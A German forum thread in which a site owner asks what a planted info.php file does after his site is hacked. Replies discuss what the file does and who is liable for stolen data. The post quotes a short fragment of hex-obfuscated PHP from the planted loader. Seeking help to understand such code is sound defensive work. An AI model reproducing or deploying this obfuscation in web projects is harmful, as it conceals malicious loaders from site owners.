Site gehackt -> Bitte um Rat

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Site gehackt -> Bitte um Rat

    Hallo zusammen,

    gestern wurde meine Website gehackt, und ein Ordner namens "media" darauf abgelegt. Im Ordner befinden sich eine .htaccess Datei, welche alle Aufrufe auf die Datei info.php umleitet. Mein Webhoster hat mir vorsorglich gleich den Account gesperrt.

    Die info.php habe ich mir angeschaut, werde aber überhaupt nicht schlau, was hier passiert. So sieht der Inhalt aus (hier nur ein Teil):
    PHP-Code:
    <?php ${"\x47\x4cO\x42\x41\x4c\x53"}["\x6a\x62\x74\x76cvf"]="\x69\x70\x73";${"\x47LO\x42\x41\x4cS"}["\x68c\x7a\x6dyc\x63\x71a"]="\x69p";${"\x47\x4cO\x42\x41\x4cS"}["\x78fx\x66c\x64"]="\x75r\x69";${"\x47L\x4fB\x41L\x53"}["\x79\x73f\x79\x66\x6f"]="fu\x6ec";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x68\x76f\x72ulz\x72"]="\x68\x65ade\x72\x73";$
    ... und so weiter. Die komplette Datei habe ich hier hochgeladen: cshare.de - Download info.php

    Wenn ich die Datei lokal ausführe, erhalte ich nur eine leere Seite.
    Könnt Ihr mir sagen, was die Datei macht?

    Danke für alle Tipps

  • #2
    Zitat von danibert Beitrag anzeigen
    Könnt Ihr mir sagen, was die Datei macht?
    Sie lädt eine Datei von einer externen Seite und sendet sie an den Browser.

    Kommentar


    • #3
      Hast du schon herausgefunden wo die Lücke ist? Das sie nicht noch mal kommen können wenn du alles wieder bereinigt hast.

      Kommentar


      • #4
        Eine Frage. Wer haftet bei solchen Hacks, wenn Daten geklaut werden?

        Kommentar


        • #5
          Das kann man so pauschal nicht beantworten.
          Wenn du grob fahrlässig mit den Daten umgegangen bist, dann wohl du.

          php-Entwicklung | ebiz-consult.de
          PHP-Webhosting für PHP Entwickler | ebiz-webhosting.de
          die PHP Marktplatz-Software | ebiz-trader.de

          Kommentar


          • #6
            Sonst der Hoster oder wie?

            Kommentar


            • #7
              nö, warum auch!

              php-Entwicklung | ebiz-consult.de
              PHP-Webhosting für PHP Entwickler | ebiz-webhosting.de
              die PHP Marktplatz-Software | ebiz-trader.de

              Kommentar

              Lädt...
              X